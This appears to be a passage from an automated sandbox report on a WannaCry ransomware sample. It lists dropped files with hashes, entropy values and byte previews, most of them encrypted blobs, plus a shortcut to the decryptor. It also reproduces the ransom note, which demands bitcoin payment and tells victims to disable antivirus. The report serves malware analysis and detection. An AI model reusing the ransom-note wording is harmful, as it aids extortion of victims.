                                                                              Preview:WANACRY!.....3.bO...6.{T...)Ed...E......O.....y...#\......F.(.c..})...W.. RBV>.c....J.K. .V1'....}.B.Z.....G*I..V..).....X....+...<..Y,{..R.^.........k.....B......q........r4Ge..x.PW.JSw...Im.s8.C.Q\.y.0.;g....5+.B.....@..C?...E^..2.,X.hZ..x..J?......$.............v....W......i.io.^..c.KL.N..9cSHutLV.P...x.'.N.F.Y.7..o...9Q..=n...yt..7...A>4......I.q.'+j.!...~...v.J[+..C.=.j*Z...m..*.}..;..X.W....>dT.i:67.6.(..7....Tk5......}.....AX......(.4.R.j... .........$..g..m...;.q'..$.....TL..F8_.4..g.i9..._...M.x.K...-..F8....@...K.x..).Cjk.`.<gB.MG.i.3'..\....X..^].......+.Vi..+.I....n.....Z..X.(!...m.e....+!..".&.......52..r....%g.e..k..H..S.L..._m..T...1..Z...)...C...'.....`....TL..i-m\...n..dT..H...}..R$.gr/...'WO..v.?.R.4..UA4..c..}[..He)...j.H{A..T..THV.....Z<..q..B.46....B..H..P...;...~..].....y...&i...*.ex..dig..9.&.\e....i....r..i.p.a^..3.......Q.....&....h.....iR...|.,.)=..F..Z.....R+.R14...2L,.*|..q...Gt.....P2B..6Z.M.15...T.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.804241819329037
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkzpAz3qFBKCRBT4kAoD+MDq3eB4VTluRAEAxe+WPvg93L7DQs1j7Ivodg9Ng+pu:bkAKhAote3e4JluRAm+WQ93L4s1WNg+A
                                                                              MD5:90377289ACAD5779F5D70DF7A95F50BD
                                                                              SHA1:CD920971A45EA3A648A71EF744E192FBB320A50D
                                                                              SHA-256:0A6314854D652377881F922BE82049A9420EE2E1BE60C279C757173B63F1A91F
                                                                              SHA-512:C905F7C17A0638EB54439017765409CBF79EAE7129EC953DE70E3C473CC70F54DD032742B2D48B1BF4F72A48F3204B76B9AEF73F2371FFB7D965FB11DC0B877E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....3.bO...6.{T...)Ed...E......O.....y...#\......F.(.c..})...W.. RBV>.c....J.K. .V1'....}.B.Z.....G*I..V..).....X....+...<..Y,{..R.^.........k.....B......q........r4Ge..x.PW.JSw...Im.s8.C.Q\.y.0.;g....5+.B.....@..C?...E^..2.,X.hZ..x..J?......$.............v....W......i.io.^..c.KL.N..9cSHutLV.P...x.'.N.F.Y.7..o...9Q..=n...yt..7...A>4......I.q.'+j.!...~...v.J[+..C.=.j*Z...m..*.}..;..X.W....>dT.i:67.6.(..7....Tk5......}.....AX......(.4.R.j... .........$..g..m...;.q'..$.....TL..F8_.4..g.i9..._...M.x.K...-..F8....@...K.x..).Cjk.`.<gB.MG.i.3'..\....X..^].......+.Vi..+.I....n.....Z..X.(!...m.e....+!..".&.......52..r....%g.e..k..H..S.L..._m..T...1..Z...)...C...'.....`....TL..i-m\...n..dT..H...}..R$.gr/...'WO..v.?.R.4..UA4..c..}[..He)...j.H{A..T..THV.....Z<..q..B.46....B..H..P...;...~..].....y...&i...*.ex..dig..9.&.\e....i....r..i.p.a^..3.......Q.....&....h.....iR...|.,.)=..F..Z.....R+.R14...2L,.*|..q...Gt.....P2B..6Z.M.15...T.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.830503485654638
                                                                              Encrypted:false
                                                                              SSDEEP:24:50syl7Jfov631YyslqqZwhsQ+pQFXRvu5NPNR:5XyVJf663mojsQDJRYNP7
                                                                              MD5:813F8F2A511C04EF6D18538C49C3B9CD
                                                                              SHA1:B7ADC0E18FA4BC7CBFFD21EA4200A0A9910C11FA
                                                                              SHA-256:E800A32D6E0C590C9101BC44913B5D193E761276FFE4805453E88478493699DA
                                                                              SHA-512:CAC1450EB98E77FADA3E659162CD7E601F66ABD12BC7EAB30FCCE97C960EA84653AACDF836FE0744233D757BBBA780C36508A42E4DDD99F841C481C913323A94
                                                                              Malicious:false
                                                                              Preview:q?..nd.].A .DT.}...f.....5......S*)5..?;..R.VL@'...*#.n2.P..I.-...-..+.k..V..eW.v.niUQk.[.iN.S..l.-e...@1|7.....z.u..M...IAn..T.o.5..]).K6... ........ .S.v..(...1.dD.~..w.u8...RH.q. .1$..y.p|.....x.."..C..yQx......stvOZ^...<......u....|.xG....HLr..W..).W..;..3...5'D..0.....Q.....t...-n....U.=...c.v....B...?.b.7f..RfX!2jM.\.....KR.~J.w.....y.%>.t..g....j......C..!...B?......v......`".=..w...$..VX....X..F....lr..v&G.....f.7n.......%...O.@.5..1.d..pO..@2..G!..H.$.....L........Fh.V-./.xx....,..f...0.n..n.y4..[..L..+.....1:-U...|7B.......F..v...C=..../.....c. .c..e)h......%..~J.'...@.......S..V....}.P...........|A%..I^^.W..f..e..@p9..{..F.|.. ......'.....Gz.k...Z...Y0...F...~.q....i.!Rw.:...z.6.,.}......+..G.....~...U....-.j]7V4..P....._{=b.yl.4.........)j.|..~..=h...{......96?.^..le..#..#C..LC..0.4.8.....~....G....tL`.C?eB.7CI,...2.%.....=#...)...2...T^........(..G..cdT......;JoH.^.>&b3..._Hh...D......D|...tP....u,je..........V.U.....K..v
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.835580731209042
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkzDfZiSkoWxFauf5stFsWal8xsP2+FxS3VSNXx9liTHViUd3:bkzDfYSkBFRWaINYLkT1io
                                                                              MD5:3E707D16FBC25CB2641A739EAD3E1B45
                                                                              SHA1:4F9EE60ABA8093E3102620990C7FC2C6D20D81B6
                                                                              SHA-256:56EFBBE01CAB8FF2B89711F67A5184FC995CFA5BA8EE829AEEB5B44CA793BA4C
                                                                              SHA-512:CBAB597E8252AF7EF3456362081D49ADED13250640EE4867F691F513961ACB9E37AAD62FE41DB12E4BCB1B6E5BCFDD653F2FC7720D6360B6C3C31D9DE214EAE4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....w.`].2<.@.5..ba....kI..S{....Ep^..r6:k..:~...BR.....:7*..q.....f...{,.9L.;. .......jA......#.....(..T2a....DZ....~T..|;.......M.....0d...1... .~.. L....&o#..9..$...s3..5.s.N./{ .w.x1.<.&.`.\++'r...\b....h.C...d..dZ.2....`.O..f.:..P..ph.t..zl=................`..&.MN.K.o...2.k........Y.....b....ok...&e..-...'.Q..,.5.[...M...iB!.....e....J@...$z.wUi..',...A......h^4.Ur.....>.G..H.+k.....d......~...d.MH?C........YB..........6....0..b....N.E..1O."|...v...W1W........!I.9.9..]............N..4........q.%A....k.b..s1..E.Y..w.@..........:.#...?.......3r@.....>...B.JM.7.+.5i..../..3..\.......r....Zs.}..}.gU.Y......g..p`.a.A.Td...jr...N.c....u6k..^r.M....<.~a@...:..|.;._}..(.%.y...zO.'.bz....P......L"..cB..&..F..8...'.{..x..'.....?k.,...Lq(....:s.*N9..O=.%.M..y..%r..L.p0.X-.i4-..=;........F1.p.P%...5~...G..."..*.g....a.P>...n.].#$l..5.Z.[zO.eQh."......#....I..E.q..2...%...zB...r.{...........Ge3..............!...5::?..'......-..y..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.835580731209042
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkzDfZiSkoWxFauf5stFsWal8xsP2+FxS3VSNXx9liTHViUd3:bkzDfYSkBFRWaINYLkT1io
                                                                              MD5:3E707D16FBC25CB2641A739EAD3E1B45
                                                                              SHA1:4F9EE60ABA8093E3102620990C7FC2C6D20D81B6
                                                                              SHA-256:56EFBBE01CAB8FF2B89711F67A5184FC995CFA5BA8EE829AEEB5B44CA793BA4C
                                                                              SHA-512:CBAB597E8252AF7EF3456362081D49ADED13250640EE4867F691F513961ACB9E37AAD62FE41DB12E4BCB1B6E5BCFDD653F2FC7720D6360B6C3C31D9DE214EAE4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....w.`].2<.@.5..ba....kI..S{....Ep^..r6:k..:~...BR.....:7*..q.....f...{,.9L.;. .......jA......#.....(..T2a....DZ....~T..|;.......M.....0d...1... .~.. L....&o#..9..$...s3..5.s.N./{ .w.x1.<.&.`.\++'r...\b....h.C...d..dZ.2....`.O..f.:..P..ph.t..zl=................`..&.MN.K.o...2.k........Y.....b....ok...&e..-...'.Q..,.5.[...M...iB!.....e....J@...$z.wUi..',...A......h^4.Ur.....>.G..H.+k.....d......~...d.MH?C........YB..........6....0..b....N.E..1O."|...v...W1W........!I.9.9..]............N..4........q.%A....k.b..s1..E.Y..w.@..........:.#...?.......3r@.....>...B.JM.7.+.5i..../..3..\.......r....Zs.}..}.gU.Y......g..p`.a.A.Td...jr...N.c....u6k..^r.M....<.~a@...:..|.;._}..(.%.y...zO.'.bz....P......L"..cB..&..F..8...'.{..x..'.....?k.,...Lq(....:s.*N9..O=.%.M..y..%r..L.p0.X-.i4-..=;........F1.p.P%...5~...G..."..*.g....a.P>...n.].#$l..5.Z.[zO.eQh."......#....I..E.q..2...%...zB...r.{...........Ge3..............!...5::?..'......-..y..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.808599384761948
                                                                              Encrypted:false
                                                                              SSDEEP:24:NHIdMKPYdMjG+0AGso72/k4mmaplfGBG7:9qFTjR/k4mmaplfGQ
                                                                              MD5:D77C28BD3DC72D39030DA6C041D95D5A
                                                                              SHA1:A84C66DBB1C35DAF6007B8203892999A00E9C66A
                                                                              SHA-256:CF62040B08DF1C0A603999D36E554791FBB8957F9A8A401DDE6FC5DE69EC3980
                                                                              SHA-512:82ED47071031A05E76747E06B02A9096C70CB30EE443F993129DDFF949F2D54E9C97E6FA9A7B33C8369EC77D961F0EF8B8C324A642983C47CD1B8E46AA85C0C6
                                                                              Malicious:false
                                                                              Preview:.X.g....^`...q....t..Evx........rL.D.....B6n.=.. ..1....z....w.....*..{.8.JK_.X..{p...h.@..5.....^O.%......Vf.....H.. ....#B.v.....E)ed..h.CA.{.^...d{E..)..v..K..J7~=..S.-..r)...!rO........B_&~*....3..O....Q....Q....:M;.6.k~...^....\.".....H..Zriw.2..p|. .6x....h}...,...gf....?hp.p...A. .K.zfj.c........{l.WB.*/..s..N7.ell.....n..BFR.r...ls..H.%...q..b..."?.. J..6.............oq[.M!.....9-W$.....C/....t].%..`.%..A.;.....T.l..?.L..e\._I.......F..X.L..;2..}c......|."Y.....[)E...U".j......@..8.h...E.......8$'P.G..6\.F.[k.llv2.=t.2:...m.H......{.cX..A..e.R...(.I.Q.'.XdD.p......4.^#5..".9.`......u.~.7.u.1....LS..-...D.'.e..u.A[qj..........;...v.Fj}..O.3.K4........i.T.......#.^.8F.....u{.E."zp......Y.......#..1U..K.O.$cr..N.-.<{..j..cax...2y..%.9.X.K..d.O.C..v|......~+R.E.6..af^......J...g.=<d.+..ie..8....T"M.l..E.$..-.KA..`.K..e/.+...2..>|..g.^..4N.Q.h.>.ESz#D82..5..d.4.Y\...9.2...st..>R.\.....yM/.-...)....xg7........W.BT...F.......2o.7
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.813658309441798
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkrvuYiskerQr6ime/e2XluThy1Gh6KUST4n30YJ6u8euw5AYjU:bkTOte7heW2XluTV+uoAZ
                                                                              MD5:DE495D9DB769CA7290C76B22C53FFBC9
                                                                              SHA1:A532A7B8171F964B5F31F7EF01712290DA077BC8
                                                                              SHA-256:E1D512E272FBBE2ED9710377BEFE7A3E199FA16BD3CA77E54EE1EFAA4BD77001
                                                                              SHA-512:593E2AAB6D4B7E76A53400BE5CD9AA47EEBA2D4403ED2A6BADFBFBE0AEB3FAF2D6936842DC1591CE1AC59564D3C1832CB362EFB326827E107BF96392A999DBCC
                                                                              Malicious:false
                                                                              Preview:WANACRY!....hb.4.._......b..z}..TJ.F.].X..O........L..=..j..u...^_..*..~.2*8..}...'...k_...?n...a3.:.LL..c.<._~...?..w....0.T.......G.S....),..$Z.I<..E.Av.7.A.n.,M.\.C.c?..D..Q.h...+p.../..G....8F......D.s...L..."S..&MI....vE.h.&11....Q....k.6.`.U.....X.|4T.............g+0........oXt.4!..>....f...r.....($..1...$.g8.qN.(d..EA."5....B....F.`...'..&".......l!...U$.d..M9.J.....-..3mh....Ao.3..r:_.i.-.....{..T.../Z....~.M...8.K.M8j]..'..D...=5#.|...wP..Q. ..v.,..?i-...h..j.o..u^/Ma........P...HD..Y...7^%..}p'.h...j....@.:...|..........dnLy...f6.I.B|o....~....`r.,..Yd.8{..E....=.........`...id..^e&nNn..C.a.t..G.u.......^.G.F.w.:.v...^..D..B.......B..6.].h~..T&.g...#.!.B=..#X.OW.....uJ.,a..p.:.A.K.l..."..Ai.8vr.gh$...x./..u.5j..:.=..(.*.._.M...By....HX3.....r......k..9.@.9.p.a....^..~.u; .p.C.....>"n....i..3...X.;...r:.....u....j...v..w..J..dT. ......m.Qs.J~..d.>&...d..;.w.eW....#.u........."..O]|.1.2.."..:~....+.L...K.:...G.'.(D...I.^sj....=.H....0..`
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.813658309441798
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkrvuYiskerQr6ime/e2XluThy1Gh6KUST4n30YJ6u8euw5AYjU:bkTOte7heW2XluTV+uoAZ
                                                                              MD5:DE495D9DB769CA7290C76B22C53FFBC9
                                                                              SHA1:A532A7B8171F964B5F31F7EF01712290DA077BC8
                                                                              SHA-256:E1D512E272FBBE2ED9710377BEFE7A3E199FA16BD3CA77E54EE1EFAA4BD77001
                                                                              SHA-512:593E2AAB6D4B7E76A53400BE5CD9AA47EEBA2D4403ED2A6BADFBFBE0AEB3FAF2D6936842DC1591CE1AC59564D3C1832CB362EFB326827E107BF96392A999DBCC
                                                                              Malicious:false
                                                                              Preview:WANACRY!....hb.4.._......b..z}..TJ.F.].X..O........L..=..j..u...^_..*..~.2*8..}...'...k_...?n...a3.:.LL..c.<._~...?..w....0.T.......G.S....),..$Z.I<..E.Av.7.A.n.,M.\.C.c?..D..Q.h...+p.../..G....8F......D.s...L..."S..&MI....vE.h.&11....Q....k.6.`.U.....X.|4T.............g+0........oXt.4!..>....f...r.....($..1...$.g8.qN.(d..EA."5....B....F.`...'..&".......l!...U$.d..M9.J.....-..3mh....Ao.3..r:_.i.-.....{..T.../Z....~.M...8.K.M8j]..'..D...=5#.|...wP..Q. ..v.,..?i-...h..j.o..u^/Ma........P...HD..Y...7^%..}p'.h...j....@.:...|..........dnLy...f6.I.B|o....~....`r.,..Yd.8{..E....=.........`...id..^e&nNn..C.a.t..G.u.......^.G.F.w.:.v...^..D..B.......B..6.].h~..T&.g...#.!.B=..#X.OW.....uJ.,a..p.:.A.K.l..."..Ai.8vr.gh$...x./..u.5j..:.=..(.*.._.M...By....HX3.....r......k..9.@.9.p.a....^..~.u; .p.C.....>"n....i..3...X.;...r:.....u....j...v..w..J..dT. ......m.Qs.J~..d.>&...d..;.w.eW....#.u........."..O]|.1.2.."..:~....+.L...K.:...G.'.(D...I.^sj....=.H....0..`
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.826520726652698
                                                                              Encrypted:false
                                                                              SSDEEP:24:FPmRHMSc0flXr3KCRKWIE0uOeCbJHxvZZVVtpxcFQwqTyV3roD:FPmRsSc0fZr3KjE0uxCbJHlf/WIyxk
                                                                              MD5:E9F8AD48750F3FCCB8694B3666CF9C4F
                                                                              SHA1:D5D228A1C2C0C903DA418069DA1AC04C1433CD31
                                                                              SHA-256:F10815B345DB464E087EC9F9087E780A0D4C26D28AB91CA59F687B7100126820
                                                                              SHA-512:57F032C9084E187CC18E2857A971D406005ADDF367CE385064B7E7E7B70770A7E16708B19377E045EDA5B7C83FDAE38D1A5094CB1838D711D7DAC93A1AEA3723
                                                                              Malicious:false
                                                                              Preview:.C.8.....0..,...........2.." ].A/....'.Z..T....:.-.@.r!...y....L...Q..+o.r...1h4.C$.D..o.R.7....~...&.]...8`dZ.UT.6.....=...{.x.t6c/`...A..l..~(.{f.1>.x.v.e.6..2K.=I........0.X..'..Xz.......J...:FSk...MOX.[..S.,....S....uA*.....g....L.J..M"@..^..P..U....5.Q..n.~-L..8..)..\.e.&...X..5.....tG.Y........T.\..4..%.%......^IT.0.".&.........r......[.w.,...CH...&...d...x+.W.....7f.V:..~.l..8..$.L...J...A.d.K.....d..c)`a\..*.s......J..<.9|9...y.(....R[.]..H....Y.r.|.a.V.\.^.bCjP.....t.1..H8...V..n#%.5d..^.&.......t.9...g.V..E......Q..0'...)..j.(.cS....u.NYY..B..Z+7..#...._..|?..R...:[[."..Q.E-.3G.s...f\...1E.I .=.zT..D.........c...+.g....rl.7_J#A.....g,.....c...$.H...Z.3...........M...#..hS..g|/...MU.S.W...c...LHZ.......E=.G.o5.<(.\.......,.)V,.;..f"..\.0...BF..!.A.._.....y.u.1.....#..U.....!....&;....ff.....NH{..'..yNtC..0.EQ^.....p.*...".Y...0<....jO..W.+'.0.=.C..5\..y.q....p......q....=..Iqb.....Gt.....H.\o.f..d..OW.....0r!B....s..._r[.S.2.X
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.832075713803774
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkjc+D5g8BvakJEcMtl09VO/7k8D2E9nk814SqyXr3Kaji1PBFGyzR0:bkXDdtya18KEtk814SZXr6zpB7i
                                                                              MD5:5F502A53B1F282D079358ED310BD16D0
                                                                              SHA1:7CFA5F68FA3C9593EE447AF763CB832F197B3F38
                                                                              SHA-256:496147908BA5638A02641B8288BC713C8F1CA76525829418BE08C28E4C05FC5D
                                                                              SHA-512:B5D94639C8097F0278A42E3E049E4A754C221A2AA37BA225C5D18CE7A2B600C046155A492703C7F24836E0206DE9E962600B96D6BA7B6151F8EF2050D51571DB
                                                                              Malicious:false
                                                                              Preview:WANACRY!....l.,hh.h..J.u..v.@..e.i...J.P2.>..........p}...G..IS.!.......].\*f.(....H6..Wf....g./......%q...W@..T(....n4..p.u.j.=...663.<dy..K../*.........!}.g...3E....u..\0.< !.Im....z.....u.d.o.C.;....P...R..&"(..H..Q.-W......[.........`..1T.....+...............:y.....c....S:>6.x.I..[}.........gM..^.>zq..D.)%.>[.G'o2v..........ej.c...,_]u.Y..k.b....&>_.tD)..,....1..o.!....../..S9.}.A...)...7....C...&..$;"(..n._......J.Y....<...Y4..Q.4V5.X.W.>.a.Zo:#......{..{.....OC..+..}`........Y.....a.........N.I.. B..9..8c..0.".....;d.DO.s...l........H.+.F..'.H.../..N...s....+R...../.q.X...;..........Y.......1R*..4.\.8)B.....t.J4......+........./.R.o..9..E.S8.a..b.W\...G..n.^...F(1..;..6M..p..N#.......`..s.......Cke...../B......d.c?9....&.wx..X..#OmL..g.x..u-..2>..U.....g.....O>.!Gk.%..^..B.......Y.H..L).B.p........S..E9ZD.9....>z.P-.O.qn....B...........E......k+o.....*er.."JY@..Oq...v.5.._......$h[V....zA....V\.....a..O..\.|.s....?....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.832075713803774
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkjc+D5g8BvakJEcMtl09VO/7k8D2E9nk814SqyXr3Kaji1PBFGyzR0:bkXDdtya18KEtk814SZXr6zpB7i
                                                                              MD5:5F502A53B1F282D079358ED310BD16D0
                                                                              SHA1:7CFA5F68FA3C9593EE447AF763CB832F197B3F38
                                                                              SHA-256:496147908BA5638A02641B8288BC713C8F1CA76525829418BE08C28E4C05FC5D
                                                                              SHA-512:B5D94639C8097F0278A42E3E049E4A754C221A2AA37BA225C5D18CE7A2B600C046155A492703C7F24836E0206DE9E962600B96D6BA7B6151F8EF2050D51571DB
                                                                              Malicious:false
                                                                              Preview:WANACRY!....l.,hh.h..J.u..v.@..e.i...J.P2.>..........p}...G..IS.!.......].\*f.(....H6..Wf....g./......%q...W@..T(....n4..p.u.j.=...663.<dy..K../*.........!}.g...3E....u..\0.< !.Im....z.....u.d.o.C.;....P...R..&"(..H..Q.-W......[.........`..1T.....+...............:y.....c....S:>6.x.I..[}.........gM..^.>zq..D.)%.>[.G'o2v..........ej.c...,_]u.Y..k.b....&>_.tD)..,....1..o.!....../..S9.}.A...)...7....C...&..$;"(..n._......J.Y....<...Y4..Q.4V5.X.W.>.a.Zo:#......{..{.....OC..+..}`........Y.....a.........N.I.. B..9..8c..0.".....;d.DO.s...l........H.+.F..'.H.../..N...s....+R...../.q.X...;..........Y.......1R*..4.\.8)B.....t.J4......+........./.R.o..9..E.S8.a..b.W\...G..n.^...F(1..;..6M..p..N#.......`..s.......Cke...../B......d.c?9....&.wx..X..#OmL..g.x..u-..2>..U.....g.....O>.!Gk.%..^..B.......Y.H..L).B.p........S..E9ZD.9....>z.P-.O.qn....B...........E......k+o.....*er.."JY@..Oq...v.5.._......$h[V....zA....V\.....a..O..\.|.s....?....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:false
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.820801471327097
                                                                              Encrypted:false
                                                                              SSDEEP:24:ix1ilSyCY2RFN+v2OpB90wsKVioa/Ni/+KtR5TA/MttAd:UvTY2RmVpkKVM/Ni/fR5TAkvM
                                                                              MD5:18948520F5DE8830D919332324CB9080
                                                                              SHA1:215FE9BB1217C20E22B175A9953FE42A1F161754
                                                                              SHA-256:1DE8F6D00D635FA1A7263910B348C18B75AB92EDE43F04D6F0D0FBCD3D2B529A
                                                                              SHA-512:E1FDEB4B6CD434A3DCB5FD2A73E34F8F379456D0921791928D75A1F5492060A863C6D41AD61F0DC3CEB3D0B446BCA8AD85E909981DED65D6910C1C8C29EEA06F
                                                                              Malicious:false
                                                                              Preview:1=..~.......}n...=.....-..v*...Q...9K=G.]..E..n..!?......nW....M."...Q*..<......U.>9..."..1..n..).z..n.....q&t...%..?....*.....il....V..6....P..0....(.|..e3].H-q.*.W.*%.-:..h..'..]....,.....(a....{t....I...Li..rw..pFu._#~u....*.@c.1.|bX..J{..a.z....3......y+...:.1_.p.....Y...).W..@.9.3...,.&..\.9.w{o..$@.).t.8.w=...".m.3...f./...T.......i.I..^.?...s..4m..D...Z^#.Gr.c...h...t*.+6. 7.......ti..,...6...O#5..*.3.U..|........8X...\I.....`..\..YJc#.B.<,.v.e.x.%.f.../......{7..1..b.~...=..>.....h....HjF....v.3J0...t..U%.i.e.fV.;...c...^;.[.cBX.y.?g.4K.z..s.....X..FCC......DLE...8.....A...fp.0R.<..........?aW.c?.....X.:w..ei.Pb.P9\fyC[O.,.....,Tfx..A.=!...vl..x.{.3P2....d0...p...V.....w.0.D.#cva._...@..).mxZ.....l..p....opy....<8F ]..JE....,7...L.Z.........L..e.X.T.t...}.H.0.D...u..~YAiv...3.O..A.c.S7.F.yD,..9.]O.._.w..8/^....B.....;j.T.~....1..OfL.d.F+O..@..Z\..s...9i..+.~b.]......q.e...c..... ....s2V..l..5.].>...[.....=.H.....<.o.w.i....@.a.(..>7
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841889727880849
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkC/rV7gLwTagfHsfxRk4sfiLy5g/z+7tJ4OnMJgiKNWmktCkkL4Y9hyd7ShT6bl:bkCzV7gLzgfHsfU5fiLy5mz+0OnMJI81
                                                                              MD5:E59F4D566E37B11745B328A21BEC67A8
                                                                              SHA1:E999584242D2F21830CCFDA44A48121AF4ED49C1
                                                                              SHA-256:107EB7513F48F5C183B1A450FB784827186B02D749A0BC1850299687351F83E1
                                                                              SHA-512:025CCEA4799701C4623BFBF326F103E968F3755A153D7497749DAED5A66D51686BB20AC07770BCF647D505BAA20CA18425B56B1C13927C54C27CAD95A1E2420A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....@U.Eo.w.Z.....B..St..!A.IT..Q*.%......t..|.B2......KK.0....B3^./..$.".4......L..J..,..:.&G.M1..A..m.YD......n.<.'..{C.{q...V...R....(........;...x....^.?...(."..`l...#.1:6.V..K|.(TR...l.A.^...'>Yy.-NW.l....r..e..)N.t...k......jB....l..Z.~].9...............B.<.{:...W...>..=.+..h..{ ..0)..l.[.....lN..97..?R.}....%S.T.T=r...?3.Q.~.x.J0.]G~+:z......`...qO..}B.5..R.K0.._.F.c..H.E~...Ic..6..j '......~.B7...F&BuL-..N<..$^."..9.z...a2..o.5 k.I.B.W|.X.....< ..%....W.. .x.a.E...W.....]..8F.....Y..qvtd......N.S..FW.cZ..R?;.%k.l..D2...@...l....fX=d.t.\/.$]..O.6...,.....27w..".U.Sq..;...L.z.l.VOf/.c1...j...Y..q.....".MV....p......OQQ.U.&LyR....G....X=0....*..ko..U..*.>h.e.R.}g...e.9.}...k.)..W..[fy..M...=..S........p..."....8....lW.&......#...m}`|R4.......(.qu`r..y...b:.a..b6....J....'.l.....x....I...O.....HR.. ....u..w.Mw'.iO>.t..@.."}._.k!.cl.E1/....A.I{....D..bi_....;...~5......!.|.....(...d...7..l;.].m.5..."....So.K......#,..5..:..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841889727880849
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkC/rV7gLwTagfHsfxRk4sfiLy5g/z+7tJ4OnMJgiKNWmktCkkL4Y9hyd7ShT6bl:bkCzV7gLzgfHsfU5fiLy5mz+0OnMJI81
                                                                              MD5:E59F4D566E37B11745B328A21BEC67A8
